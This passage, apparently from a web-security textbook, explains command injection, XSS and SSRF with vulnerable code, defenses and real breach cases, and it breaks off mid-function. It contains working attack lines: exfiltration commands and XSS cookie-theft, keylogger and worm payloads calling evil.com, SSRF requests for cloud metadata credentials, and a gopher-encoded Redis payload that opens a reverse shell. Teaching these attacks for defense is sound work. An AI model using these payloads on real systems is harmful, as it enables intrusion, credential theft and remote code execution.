- Web Application Firewall (WAF): Can block known injection patterns, but treat as a safety net, not the primary defense. WAFs can be bypassed through encoding, obfuscation, and protocol tricks.
- Stored procedures: When used correctly with parameterized inputs, they enforce the query structure at the database level. But stored procedures that concatenate internally are just as vulnerable:
-- VULNERABLE stored procedure
CREATE PROCEDURE GetUser(IN uname VARCHAR(100))
BEGIN
SET @query = CONCAT('SELECT * FROM users WHERE username = ''', uname, '''');
PREPARE stmt FROM @query;
EXECUTE stmt;
END
-- SAFE stored procedure
CREATE PROCEDURE GetUser(IN uname VARCHAR(100))
BEGIN
SELECT * FROM users WHERE username = uname;
END
- Error handling: Never expose database error messages to users. They reveal table names, column types, database versions, and query structure -- all valuable to an attacker performing injection.
# Test for verbose error messages
curl -v "https://example.com/api/users?id=1'"
# If the response contains "MySQL syntax error", "pg_query",
# "ORA-", or "Microsoft SQL Server" -- you have an information leak
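On the application side, the usual pattern is to log the detailed error for operators and return a generic message to the client. The sketch below assumes SQLite and a hypothetical `fetch_user` handler that returns a status code and a response body; the logger name and the error wording are placeholders.

```python
import logging
import sqlite3

logger = logging.getLogger("app.db")  # hypothetical logger name

GENERIC_ERROR = {"error": "Something went wrong. Please try again later."}


def fetch_user(conn, user_id):
    """Return (status, body); database details never reach the response body."""
    try:
        row = conn.execute(
            "SELECT id, username FROM users WHERE id = ?", (user_id,)
        ).fetchone()
    except sqlite3.Error:
        # Full traceback goes to the server log, where only operators can read it.
        logger.exception("database error in fetch_user")
        return 500, GENERIC_ERROR
    if row is None:
        return 404, {"error": "Not found"}
    return 200, {"id": row[0], "username": row[1]}


healthy = sqlite3.connect(":memory:")
healthy.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
healthy.execute("INSERT INTO users VALUES (1, 'alice')")

broken = sqlite3.connect(":memory:")  # no users table, so every query errors

print(fetch_user(healthy, 1))
print(fetch_user(healthy, "1'"))
print(fetch_user(broken, "1'"))
```

The client learns that something failed but not which table, column, or database engine was involved.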
Command Injection and OS Command Injection
SQL is not the only interpreter. What happens when your application shells out to the operating system?
The Mechanics
Many applications execute OS commands by passing user input to a shell:
# VULNERABLE -- DO NOT USE
import os
filename = request.args.get('filename')
os.system(f"convert {filename} output.pdf")
An attacker supplies:
report.png; cat /etc/passwd; echo
The resulting command:
convert report.png; cat /etc/passwd; echo output.pdf
The semicolon terminates the first command and starts a new one. The server executes cat /etc/passwd with whatever privileges the web application runs under.
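The split can be inspected without executing anything. This sketch uses Python's `shlex` module with `punctuation_chars=True`, which approximates how a POSIX shell separates words from control operators. It is an approximation for illustration, not the shell's actual parser, and `shell_view` is a made-up helper name.

```python
import shlex


def shell_view(command):
    """Approximate the shell's tokenization, keeping operators like ; as tokens."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    return list(lexer)


filename = "report.png; cat /etc/passwd; echo"
command = f"convert {filename} output.pdf"

tokens = shell_view(command)
print(tokens)

# Every ';' token ends one command and begins another.
command_count = tokens.count(";") + 1
print(command_count)
```

What the developer wrote as one command with two arguments reaches the shell as three separate commands.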
Command injection operators and their behavior:
| Operator | Behavior | Example |
|---|---|---|
| `;` | Sequential execution | `cmd1; cmd2` |
| `&&` | Execute second if first succeeds | `cmd1 && cmd2` |
| `\|\|` | Execute second if first fails | `cmd1 \|\| cmd2` |
| `\|` | Pipe output to second command | `cmd1 \| cmd2` |
| `$(cmd)` | Command substitution | `echo $(whoami)` |
| `` `cmd` `` | Command substitution (backticks) | ``echo `whoami` `` |
| `\n` | Newline -- starts new command | `cmd1\ncmd2` |
| `> file` | Redirect output (overwrite) | `cmd > /tmp/data` |
| `>> file` | Redirect output (append) | `cmd >> /tmp/log` |
Out-of-Band Command Injection
When command output is not visible in the response, attackers use out-of-band techniques to exfiltrate data:
# DNS-based exfiltration -- the attacker controls evil.com's DNS
; nslookup $(whoami).evil.com
# The DNS query reveals the username in the subdomain
# HTTP-based exfiltration
; curl https://evil.com/log?data=$(cat /etc/passwd | base64)
# Time-based detection (like blind SQLi)
; sleep 5
# If response takes 5 extra seconds, command injection exists
# File-based -- write output to a web-accessible location
; ls -la > /var/www/html/output.txt
graph TD
A[User Input] --> B{Application uses shell?}
B -->|os.system / shell=True| C[Input injected into shell command]
B -->|subprocess with list args| D[Input is single argument -- SAFE]
C --> E{Shell metacharacters?}
E -->|; && || etc.| F[Attacker's command executes]
E -->|None found| G[Normal execution]
F --> H{Output visible?}
H -->|Yes| I[Direct data theft]
H -->|No| J[Out-of-band exfiltration<br/>DNS / HTTP / Time-based]
style D fill:#2ecc71,stroke:#27ae60,color:#fff
style F fill:#ff6b6b,stroke:#c0392b,color:#fff
Real Examples
ImageMagick (ImageTragick, CVE-2016-3714): ImageMagick used system() calls internally for certain file format conversions. A specially crafted image file could execute arbitrary commands:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|ls "-la)'
pop graphic-context
This led to remote code execution on servers processing image uploads -- including many major web platforms. The impact was massive because ImageMagick is one of the most widely deployed image processing libraries.
ShellShock (CVE-2014-6271): The Bash shell itself had an injection vulnerability. Environment variables containing function definitions would execute trailing commands:
env x='() { :;}; echo VULNERABLE' bash -c "echo test"
CGI scripts that passed HTTP headers as environment variables became remotely exploitable. The User-Agent header could contain shell commands that the server would execute:
curl -A '() { :;}; /bin/cat /etc/passwd' http://target.com/cgi-bin/test.cgi
Defending Against Command Injection
Primary defense: avoid shelling out entirely.
# Instead of os.system("convert ..."), use a library
from PIL import Image
img = Image.open(filename)
img.save("output.pdf")
When you absolutely must execute system commands:
# SAFE -- Use subprocess with a list (no shell interpretation)
import subprocess
result = subprocess.run(
["convert", filename, "output.pdf"],
check=True,
capture_output=True,
timeout=30 # Prevent hanging
)
# The filename is passed as a single argument to execve()
# No shell is involved -- metacharacters have no special meaning
Never pass `shell=True` to `subprocess.run()` or `subprocess.Popen()` with user-controlled input. When `shell=True`, the command is passed to `/bin/sh -c`, reintroducing all shell injection risks:
~~~python
# STILL VULNERABLE -- shell=True means shell interprets the string
subprocess.run(f"convert {filename} output.pdf", shell=True)
# SAFE -- list arguments, no shell
subprocess.run(["convert", filename, "output.pdf"])
# ALSO SAFE -- if you must use shell=True, use shlex.quote()
import shlex
subprocess.run(f"convert {shlex.quote(filename)} output.pdf", shell=True)
# But prefer the list form -- shlex.quote() is a defense layer, not the fix
~~~
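To check the claim that list arguments bypass the shell, the sketch below passes a hostile filename to a child process and has the child report what it received. The child is the Python interpreter itself rather than `convert`, purely so the example runs anywhere; the hostile filename is made up.

```python
import json
import shlex
import subprocess
import sys

hostile = "report.png; cat /etc/passwd"

# Child process that prints its own arguments as JSON (stand-in for `convert`).
child = [sys.executable, "-c", "import json, sys; print(json.dumps(sys.argv[1:]))"]

result = subprocess.run(
    child + [hostile, "output.pdf"],
    check=True,
    capture_output=True,
    text=True,
    timeout=30,
)
received = json.loads(result.stdout)
print(received)  # the hostile string arrives as one argument, semicolon and all

# shlex.quote() wraps the value so a POSIX shell would treat it as a single word.
quoted = shlex.quote(hostile)
print(quoted)
print(shlex.split(f"convert {quoted} output.pdf"))
```

Note that `shlex.quote()` targets POSIX shells only, which is one more reason to prefer the list form.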
Additional defenses:
- Allowlist validation: If the input should be a filename, verify it matches `^[a-zA-Z0-9._-]+$`. Reject path separators, spaces, and special characters.
- Chroot/sandbox: Run the process in a restricted filesystem with no access to sensitive files
- Drop privileges: Run the worker process as a dedicated low-privilege user with no shell access
- Containers: Isolate command execution in a container with minimal capabilities, read-only filesystem, no network access
- seccomp profiles: Restrict which system calls the process can make -- prevent `execve` if the process should not spawn child processes
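The filename allowlist from the first item could be implemented along these lines. This is a sketch: the two checks beyond the character-class pattern (rejecting a leading `-` and the names `.` and `..`) are additions not stated in the list above, included because the pattern alone would accept them, and `is_safe_filename` is a hypothetical helper name.

```python
import re

SAFE_FILENAME = re.compile(r"[a-zA-Z0-9._-]+")


def is_safe_filename(name):
    """Allowlist check for a bare filename (no directories, no shell syntax)."""
    # fullmatch() is used instead of ^...$ because $ also matches just before
    # a trailing newline, which would let "report.png\n" through.
    if not SAFE_FILENAME.fullmatch(name):
        return False
    # Extra check (assumption): a leading dash could be parsed as an option.
    if name.startswith("-"):
        return False
    # Extra check (assumption): "." and ".." match the pattern but are not files.
    if name in {".", ".."}:
        return False
    return True


for candidate in ["report.png", "report.png; cat /etc/passwd", "../etc/passwd",
                  "-delete", "report.png\n", ".."]:
    print(repr(candidate), is_safe_filename(candidate))
```

Validation of this kind complements the list-argument form of `subprocess.run()`; it does not replace it.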
Cross-Site Scripting (XSS)
SQL injection targets the database. Command injection targets the OS. What about the browser? That is XSS -- Cross-Site Scripting. Instead of injecting into a server-side interpreter, you inject into the HTML/JavaScript interpreter running in another user's browser. The interpreter changes, but the fundamental mechanic is identical: untrusted data becomes executable code.
Reflected XSS
The malicious script is part of the request and reflected back in the response. The victim must click a crafted link.
Vulnerable server code:
@app.route('/search')
def search():
    query = request.args.get('q', '')
    return f"<h1>Results for: {query}</h1>"
Attack URL:
https://example.com/search?q=<script>document.location='https://evil.com/steal?cookie='+document.cookie</script>
The browser receives:
<h1>Results for: <script>document.location='https://evil.com/steal?cookie='+document.cookie</script></h1>
The script executes in the context of example.com, with access to example.com's cookies, localStorage, and DOM.
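The difference between reflecting input raw and encoding it first can be seen without a web server. This sketch uses `html.escape()` from Python's standard library as one common mitigation for HTML body context; the two render functions are hypothetical stand-ins for the route handler, and other contexts (attributes, URLs, inline JavaScript) need their own encoding rules.

```python
import html


def render_results_vulnerable(query):
    """Reflects the query into the page exactly as received."""
    return f"<h1>Results for: {query}</h1>"


def render_results_escaped(query):
    """Encodes HTML metacharacters so the browser renders them as text."""
    return f"<h1>Results for: {html.escape(query)}</h1>"


payload = (
    "<script>document.location="
    "'https://evil.com/steal?cookie='+document.cookie</script>"
)

raw_page = render_results_vulnerable(payload)
safe_page = render_results_escaped(payload)
print(raw_page)
print(safe_page)
```

In the escaped page the browser displays the payload as visible text instead of parsing it as a script element.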
Real-world attack delivery methods:
# URL shortener to hide the payload
https://bit.ly/3xY7abc → long URL with XSS payload
# URL-encoded (percent-encoded) to bypass email filters
https://example.com/search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E
# Payload URL hidden behind innocuous link text in a markdown/HTML email
Click <a href="https://example.com/search?q=<script>...</script>">here</a>
Stored XSS
The payload is permanently stored on the server (in a database, comment field, forum post, user profile) and served to every user who views the page. Stored XSS is far more dangerous than reflected because it does not require the victim to click a crafted link -- they just visit a legitimate page.
sequenceDiagram
participant Attacker
participant WebApp as Web Application
participant DB as Database
participant Victim
Note over Attacker: Phase 1: Store the payload
Attacker->>WebApp: POST /comments<br/>body: Great article!<br/><script>fetch('https://evil.com',<br/>{method:'POST',body:document.cookie})</script>
WebApp->>DB: INSERT INTO comments (body) VALUES (...)
DB-->>WebApp: OK
Note over Victim: Phase 2: Victim visits the page
Victim->>WebApp: GET /article/123
WebApp->>DB: SELECT * FROM comments WHERE article_id=123
DB-->>WebApp: Returns comment with script payload
WebApp-->>Victim: HTML page with embedded <script>
Note over Victim: Browser parses HTML, executes script
Victim->>Attacker: POST https://evil.com<br/>body: session=abc123; csrf_token=xyz789
Note over Attacker: Attacker now has victim's session cookie
Attacker->>WebApp: GET /account<br/>Cookie: session=abc123
WebApp-->>Attacker: Victim's account page -- full access
Advanced stored XSS payloads:
<!-- Cookie theft -->
<script>
new Image().src='https://evil.com/log?c='+document.cookie;
</script>
<!-- Keylogger -->
<script>
document.addEventListener('keypress', function(e) {
new Image().src='https://evil.com/keys?k='+e.key;
});
</script>
<!-- Session riding -- perform actions as the victim -->
<script>
fetch('/api/transfer', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({to: 'attacker', amount: 10000}),
credentials: 'include'
});
</script>
<!-- Crypto miner -->
<script src="https://evil.com/coinhive.min.js"></script>
<!-- Worm -- self-propagating XSS -->
<script>
const payload = document.currentScript.outerHTML;
fetch('/api/profile', {
method: 'PUT',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({bio: payload}),
credentials: 'include'
});
</script>
The Samy Worm (2005): Samy Kamkar created a stored XSS worm on MySpace. His profile contained JavaScript that, when viewed, added "but most of all, samy is my hero" to the viewer's profile and copied the worm code there. Within 20 hours, over one million profiles were infected -- the fastest-spreading worm in history at that time. It exploited the fact that MySpace allowed a limited subset of HTML but did not fully filter `javascript:` URLs inside CSS style attributes, which some browsers of the era would execute.
DOM-Based XSS
The vulnerability exists entirely in client-side JavaScript. The server never sees the payload, making it invisible to server-side WAFs and input validation.
// VULNERABLE client-side code
const name = document.location.hash.substring(1);
document.getElementById('greeting').innerHTML = 'Hello, ' + name;
Attack URL:
https://example.com/page#<img src=x onerror=alert(document.cookie)>
The fragment (#...) is never sent to the server. The client-side code reads it from document.location.hash and injects it into the DOM using innerHTML, which parses and executes it.
**Common DOM XSS sinks** (dangerous functions that execute or render input):
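- `innerHTML`, `outerHTML` -- parse HTML; injected event handlers such as `onerror` execute (inserted `<script>` elements do not run, which is why payloads use `<img onerror=...>`)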
- `document.write()`, `document.writeln()` -- write directly to document
- `eval()`, `setTimeout(string)`, `setInterval(string)` -- execute JavaScript
- `element.setAttribute('onclick', ...)` -- create event handlers
- `location.href = ...` -- navigate (dangerous with `javascript:` protocol)
- `jQuery.html()`, `$(selector).html()` -- jQuery's innerHTML equivalent
- `dangerouslySetInnerHTML` in React -- bypasses React's auto-escaping
- `v-html` in Vue.js -- bypasses Vue's auto-escaping
**Common DOM XSS sources** (attacker-controlled data):
- `document.location` (and `.hash`, `.search`, `.pathname`)
- `document.referrer`
- `window.name` -- persists across navigations, attacker can set it
- `postMessage` data -- from cross-origin windows
- Web storage (`localStorage`, `sessionStorage`) if populated from untrusted sources
- URL parameters parsed by client-side routers
**The fix for DOM XSS:**
- Use `textContent` instead of `innerHTML`
- Use `createElement` + `setAttribute` instead of string HTML building
- Sanitize with DOMPurify before using `innerHTML`
- Use framework bindings (React JSX, Vue templates) that auto-escape
XSS Filter Bypass Techniques
Attackers use numerous techniques to bypass XSS filters and WAFs:
<!-- Tag variations -->
<ScRiPt>alert(1)</ScRiPt>
<SCRIPT>alert(1)</SCRIPT>
<script/src=data:,alert(1)>
<!-- Event handlers (no script tag needed) -->
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
<details open ontoggle=alert(1)>
<!-- Encoding bypasses -->
<script>alert(String.fromCharCode(88,83,83))</script>
<script>eval(atob('YWxlcnQoMSk='))</script>
<a href="javascript:alert(1)">click</a>
<a href="&#106;avascript:alert(1)">click</a>
<!-- Null bytes and whitespace -->
<scr\0ipt>alert(1)</script>
<script\t>alert(1)</script>
<!-- Polyglot payloads (work in multiple contexts) -->
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//
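None of the payloads above needs the exact string a simple blocklist looks for. The following is a minimal Python sketch, assuming a hypothetical `naive_filter` that strips only literal lowercase `<script>` tags; the helper names and the payload list are illustrative. It suggests why blocklists tend to miss variants while standard output encoding (`html.escape` from the standard library) handles all of them the same way.

```python
import html
import re

# Hypothetical blocklist filter: removes lowercase <script>...</script> only.
def naive_filter(value: str) -> str:
    return re.sub(r"<script>.*?</script>", "", value)

# A few of the payload styles listed above.
PAYLOADS = [
    "<script>alert(1)</script>",
    "<ScRiPt>alert(1)</ScRiPt>",
    "<img src=x onerror=alert(1)>",
    "<svg onload=alert(1)>",
]

def still_dangerous(value: str) -> bool:
    """Rough check: a raw '<' means the browser may still see markup."""
    return "<" in value

# Payloads that survive the blocklist with markup intact.
bypassed = [p for p in PAYLOADS if still_dangerous(naive_filter(p))]

# Output encoding turns every payload into inert text.
encoded = [html.escape(p, quote=True) for p in PAYLOADS]
```

Only the first payload is stopped by the blocklist; the encoded versions contain no raw `<` at all, regardless of which trick the payload used.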
XSS Defense
1. Output encoding (context-aware escaping):
The primary defense is encoding output based on the context where it will be rendered:
| Context | Encoding | Example |
|---|---|---|
| HTML body | `&lt; &gt; &amp; &quot; &#x27;` | `<p>Hello &lt;script&gt;</p>` |
| HTML attribute | Same, and always quote attribute values | `<input value="&quot;injected&quot;">` |
| JavaScript string | `\xHH` / `\uHHHH` escaping | `var x = "\x3cscript\x3e"` |
| URL parameter | Percent-encoding | `?q=%3Cscript%3E` |
| CSS value | `\HH` hex escaping | `background: url(\27javascript:alert\27)` |
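The same untrusted value needs a different encoder for each context in the table. A minimal sketch using only the Python standard library is shown here; the variable names are illustrative, and the JavaScript-string approach (JSON-encode, then escape `<`, `>`, and `&`) is one common technique rather than the only valid one.

```python
import html
import json
from urllib.parse import quote

untrusted = '<script>alert("x")</script>'

# HTML body or quoted attribute: entity-encode the markup characters.
html_safe = html.escape(untrusted, quote=True)

# URL parameter: percent-encode everything outside the unreserved set.
url_safe = quote(untrusted, safe="")

# JavaScript string literal inside a <script> block: JSON-encode, then
# escape '<', '>' and '&' so the value cannot close the script element.
js_safe = (
    json.dumps(untrusted)
    .replace("<", "\\u003c")
    .replace(">", "\\u003e")
    .replace("&", "\\u0026")
)
```

Each result is safe only in its own context: the HTML-encoded value is not safe inside a URL, and the percent-encoded value is not safe inside a script block.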
2. Template engines with auto-escaping:
# Jinja2 (Flask) -- auto-escapes by default
# {{ user_input }} is automatically HTML-encoded
# Use {{ user_input|safe }} ONLY when you explicitly trust the content
// React -- auto-escapes by default
// <div>{userInput}</div> is safe -- React escapes the string
// <div dangerouslySetInnerHTML={{__html: userInput}} /> is NOT
// The prop name is deliberately scary as a warning
3. Content Security Policy (CSP):
CSP prevents inline script execution even if XSS exists. This is covered in depth in Chapter 20, but the key directive is:
Content-Security-Policy: script-src 'nonce-R4nd0mV4lu3'
Only <script nonce="R4nd0mV4lu3"> tags execute. Injected scripts without the nonce are blocked by the browser.
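A nonce only helps if it is unpredictable and regenerated for every response. The sketch below, with hypothetical helper names and a hypothetical `/static/app.js` path, shows one way to produce the header value and a matching script tag using the standard library's `secrets` module.

```python
import secrets

def new_csp_nonce() -> str:
    """Return an unpredictable nonce; generate a fresh one per response."""
    return secrets.token_urlsafe(16)

def csp_header(nonce: str) -> tuple[str, str]:
    """Build the (name, value) pair for the response header."""
    return ("Content-Security-Policy", f"script-src 'nonce-{nonce}'")

def script_tag(nonce: str, src: str) -> str:
    """Render a script tag the browser will accept under this policy."""
    return f'<script nonce="{nonce}" src="{src}"></script>'

# Example for a single response; the nonce must not be reused across responses.
nonce = new_csp_nonce()
header = csp_header(nonce)
tag = script_tag(nonce, "/static/app.js")
```

An injected script cannot guess the nonce for the current response, so the browser refuses to run it.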
4. HttpOnly and SameSite cookies:
Set-Cookie: session=abc123; HttpOnly; Secure; SameSite=Strict
- `HttpOnly` prevents JavaScript from reading the cookie via `document.cookie`, neutralizing cookie-theft XSS attacks
- `Secure` ensures the cookie is only sent over HTTPS
- `SameSite=Strict` prevents the cookie from being sent in cross-site requests, mitigating CSRF
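As a rough illustration, the header above can be produced with Python's standard `http.cookies` module (the `samesite` attribute assumes Python 3.8 or later). The function name is hypothetical; web frameworks usually expose the same flags through their own cookie-setting helpers.

```python
from http.cookies import SimpleCookie

def session_cookie_header(session_id: str) -> str:
    """Render a Set-Cookie header line with the three protective flags."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True      # hide from document.cookie
    cookie["session"]["secure"] = True        # send over HTTPS only
    cookie["session"]["samesite"] = "Strict"  # omit on cross-site requests
    cookie["session"]["path"] = "/"
    # output() renders the full "Set-Cookie: ..." header line
    return cookie.output()

header_line = session_cookie_header("abc123")
```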
5. DOMPurify for user-generated HTML:
// When you MUST allow some HTML (rich text editors, markdown rendering)
import DOMPurify from 'dompurify';
const clean = DOMPurify.sanitize(dirtyHTML, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'br'],
ALLOWED_ATTR: ['href'],
ALLOW_DATA_ATTR: false
});
element.innerHTML = clean;
Test a page for reflected XSS:
~~~bash
# Basic test -- does the server reflect input without encoding?
curl -s "https://example.com/search?q=<script>alert(1)</script>" \
| grep -o '<script>alert(1)</script>'
# If the literal script tag appears -- the page is vulnerable
# If you see &lt;script&gt; -- the output is properly encoded
# Test with various payloads
curl -s "https://example.com/search?q=<img+src=x+onerror=alert(1)>"
curl -s "https://example.com/search?q=\"onmouseover=alert(1)+\""
# Check CSP headers
curl -sI "https://example.com/" | grep -i content-security-policy
# Check cookie flags
curl -sI "https://example.com/login" | grep -i set-cookie
# Look for: HttpOnly; Secure; SameSite=Strict (or Lax)
~~~
Use browser developer tools: open the Console tab, attempt to inject `<img src=x onerror=console.log('XSS')>` through various input fields, and observe whether the script executes or is encoded.
Server-Side Request Forgery (SSRF)
SSRF is an attack where you do not inject code at all -- you inject a destination. You trick the server into making requests on your behalf to places you cannot reach directly.
What Is SSRF?
SSRF occurs when an application fetches a URL specified by the user, and the attacker makes it request internal resources that should not be accessible from outside.
Vulnerable code:
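from flask import Flask, request
import requests
app = Flask(__name__)
@app.route('/fetch')
def fetch_url():
    url = request.args.get('url')
    response = requests.get(url)  # VULNERABLE: fetches any URL the caller supplies
    return response.text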
Normal use:
GET /fetch?url=https://api.example.com/data
SSRF attack -- cloud metadata theft:
GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
The IP 169.254.169.254 is the AWS Instance Metadata Service (IMDS). From outside, it is unreachable -- it is a link-local address that only responds to requests from the EC2 instance itself. But the server can reach it -- and it returns the server's IAM credentials, which may grant access to S3 buckets, databases, and other AWS services.
sequenceDiagram
participant Attacker
participant WebApp as Web Application<br/>(EC2 Instance)
participant IMDS as AWS Metadata Service<br/>(169.254.169.254)
participant S3 as AWS S3 Buckets
Attacker->>WebApp: GET /fetch?url=http://169.254.169.254/<br/>latest/meta-data/iam/security-credentials/
WebApp->>IMDS: GET /latest/meta-data/iam/security-credentials/
IMDS-->>WebApp: my-ec2-role
WebApp-->>Attacker: "my-ec2-role"
Attacker->>WebApp: GET /fetch?url=http://169.254.169.254/<br/>latest/meta-data/iam/security-credentials/my-ec2-role
WebApp->>IMDS: GET /latest/meta-data/iam/<br/>security-credentials/my-ec2-role
IMDS-->>WebApp: {"AccessKeyId": "AKIA...",<br/>"SecretAccessKey": "wJalr...",<br/>"Token": "IQoJb3..."}
WebApp-->>Attacker: IAM credentials in plain text
Note over Attacker: Attacker now has temporary AWS credentials
Attacker->>S3: aws s3 ls --profile stolen
S3-->>Attacker: List of all S3 buckets<br/>customer-data-prod/<br/>backups-2024/<br/>financial-reports/
Attacker->>S3: aws s3 cp s3://customer-data-prod . --recursive
S3-->>Attacker: Millions of customer records downloaded
SSRF Attack Targets Beyond Cloud Metadata
# Internal services not exposed to the internet
GET /fetch?url=http://10.0.1.50:8080/admin # Internal admin panel
GET /fetch?url=http://10.0.1.60:6379/ # Redis (no auth by default)
GET /fetch?url=http://10.0.1.70:9200/_cluster/health # Elasticsearch
GET /fetch?url=http://10.0.1.80:5601/api/status # Kibana
GET /fetch?url=http://10.0.1.90:2375/containers/json # Docker API (RCE!)
GET /fetch?url=http://localhost:8500/v1/agent/members # Consul
# Cloud metadata endpoints
GET /fetch?url=http://169.254.169.254/... # AWS IMDSv1
GET /fetch?url=http://metadata.google.internal/... # GCP
GET /fetch?url=http://169.254.169.254/metadata/... # Azure
# Internal port scanning
GET /fetch?url=http://10.0.1.1:22 # Timeout: filtered. Fast connection error: closed. Banner or protocol error: open.
GET /fetch?url=http://10.0.1.1:3306 # Map the entire internal network
# Protocol smuggling
GET /fetch?url=gopher://10.0.1.60:6379/_SET%20pwned%20true # Redis commands via gopher
GET /fetch?url=file:///etc/passwd # Local file read
GET /fetch?url=dict://10.0.1.60:6379/INFO # Redis INFO via dict protocol
The Capital One Breach (2019)
The Capital One breach -- one of the largest data breaches in US financial history -- was an SSRF attack.
A misconfigured WAF on an EC2 instance allowed the attacker to send a request through Capital One's infrastructure to the AWS metadata endpoint. The returned IAM role credentials had overly broad S3 permissions. The attacker used them to access S3 buckets containing 100 million credit card applications with names, addresses, credit scores, and Social Security numbers.
The attack chain:
- SSRF through the WAF to `169.254.169.254`
- Retrieved IAM credentials for the `*-WAF-Role`
- The role had `s3:GetObject` and `s3:ListBucket` on all S3 buckets
- Downloaded 700+ S3 buckets containing customer data
- Total impact: 100 million US customers, 6 million Canadian customers
The total cost to Capital One exceeded $300 million including regulatory fines, legal settlements, and remediation costs. The attacker was a former AWS employee who understood the metadata service intimately.
A fintech company had a "URL preview" feature -- paste a link, and the app fetches the page to generate a thumbnail. Classic SSRF goldmine.
An attacker discovered they could fetch `http://localhost:6379/`, which was the internal Redis instance running without authentication (default Redis configuration). They injected Redis commands through the URL path using the gopher protocol:
gopher://127.0.0.1:6379/_3%0d%0a$3%0d%0aSET%0d%0a$11%0d%0ashell_cmd%0d%0a$64%0d%0a/1 * * * * /bin/bash -c 'bash -i >& /dev/tcp/evil.com/4444 0>&1'%0d%0a*4%0d%0a$6%0d%0aCONFIG%0d%0a$3%0d%0aSET%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a...
They wrote a cron job to the server's filesystem using Redis's `CONFIG SET dir` and `CONFIG SET dbfilename` trick, and gained a reverse shell. From "paste a URL" to full server compromise in under an hour.
The fix required: allowlisting outbound URLs, blocking private IP ranges after DNS resolution, switching Redis to require authentication, and deploying IMDSv2 on all EC2 instances.
SSRF Bypass Techniques
Attackers bypass naive URL validation with creative encodings and redirects:
| Technique | Example | What it resolves to |
|---|---|---|
| Decimal IP | http://2130706433/ | 127.0.0.1 |
| Hex IP | http://0x7f000001/ | 127.0.0.1 |
| Octal IP | http://0177.0.0.1/ | 127.0.0.1 |
| IPv6 | http://[::1]/ | ::1 (IPv6 loopback, equivalent to 127.0.0.1) |
| IPv6 mapped | http://[::ffff:127.0.0.1]/ | 127.0.0.1 |
| Zero shorthand | http://0/ | 0.0.0.0 (some systems: localhost) |
| URL auth | http://evil.com@127.0.0.1/ | 127.0.0.1 |
| DNS rebinding | Custom domain | First resolves public, then private |
| Redirects | http://evil.com/redir | 302 → http://169.254.169.254/ |
| nip.io | http://127.0.0.1.nip.io/ | 127.0.0.1 |
| Enclosed alphanumeric | http://①②⑦.⓪.⓪.①/ | 127.0.0.1 (some parsers) |
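Several rows in this table work because a string comparison against `"127.0.0.1"` never sees the address the network stack will actually use. The sketch below normalizes a host literal before checking it. It assumes a platform whose C library `inet_aton` accepts decimal, hex, and octal forms (as glibc does); the function names are illustrative. DNS-based tricks such as nip.io, redirects, and rebinding still require checking the resolved address.

```python
import ipaddress
import socket

def normalize_ipv4_literal(host: str):
    """Return the IPv4Address a C-style parser would use, or None."""
    try:
        # inet_aton accepts forms like 2130706433, 0x7f000001, 0177.0.0.1
        packed = socket.inet_aton(host)
    except OSError:
        return None
    return ipaddress.IPv4Address(packed)

def is_loopback_host(host: str) -> bool:
    """Detect loopback literals, including alternate IPv4 and IPv6 spellings."""
    host = host.strip("[]")  # URL syntax wraps IPv6 literals in brackets
    v4 = normalize_ipv4_literal(host)
    if v4 is not None:
        return v4.is_loopback
    try:
        v6 = ipaddress.IPv6Address(host)
    except ValueError:
        return False  # not an IP literal; needs DNS resolution instead
    mapped = v6.ipv4_mapped
    return v6.is_loopback or (mapped is not None and mapped.is_loopback)

# Host parts taken from the first five rows of the table.
disguised = ["2130706433", "0x7f000001", "0177.0.0.1", "[::1]", "[::ffff:127.0.0.1]"]
results = [is_loopback_host(h) for h in disguised]
```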
SSRF Defense
- Allowlist, not blocklist. Only allow requests to known, specific domains or IP ranges. Blocklists always have gaps.
- Use IMDSv2 (on AWS). It requires a session token obtained via a PUT request with a special header, which a typical SSRF that can only issue GET requests cannot provide:
# IMDSv2 requires a two-step process:
# Step 1: Get a token via PUT (SSRF via GET cannot do this)
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" \
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
# Step 2: Use the token for metadata requests
curl -H "X-aws-ec2-metadata-token: $TOKEN" \
"http://169.254.169.254/latest/meta-data/"
# Enforce IMDSv2 (disable IMDSv1) on all EC2 instances:
aws ec2 modify-instance-metadata-options \
--instance-id i-1234567890abcdef0 \
--http-tokens required \
--http-endpoint enabled
- Validate resolved IP addresses after DNS resolution:
import ipaddress
import socket
from urllib.parse import urlparse
def is_safe_url(url):
    """Validate that a URL does not point to internal resources."""
    parsed = urlparse(url)
    # Only allow http and https
    if parsed.scheme not in ('http', 'https'):
        return False
    # Reject URLs with authentication components (user@host)
    if parsed.username or parsed.password:
        return False
    # Reject URLs with no host component
    if not parsed.hostname:
        return False
    # Resolve hostname to every address it maps to (IPv4 and IPv6)
    try:
        infos = socket.getaddrinfo(parsed.hostname, None)
    except socket.gaierror:
        return False
    for info in infos:
        # Drop any IPv6 scope suffix such as "%eth0" before parsing
        addr = ipaddress.ip_address(info[4][0].split('%')[0])
        # Block private, loopback, link-local, and reserved addresses
        if (addr.is_private or addr.is_loopback or
                addr.is_link_local or addr.is_reserved or
                addr.is_multicast or addr.is_unspecified):
            return False
    return True
- Pin the resolved IP and use it for the actual request to defeat DNS rebinding:
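import ipaddress
import socket
import requests
from urllib.parse import urlparse
def is_public_ip(ip):
    """Return True only for globally routable addresses."""
    return ipaddress.ip_address(ip).is_global
def safe_fetch(url):
    parsed = urlparse(url)
    if parsed.scheme not in ('http', 'https') or not parsed.hostname:
        raise ValueError("Unsupported URL")
    # Resolve DNS once
    ip = socket.gethostbyname(parsed.hostname)
    # Validate the resolved IP
    if not is_public_ip(ip):
        raise ValueError("URL resolves to a non-public IP")
    # Make the request using the pinned IP (replace only the host, keep the port)
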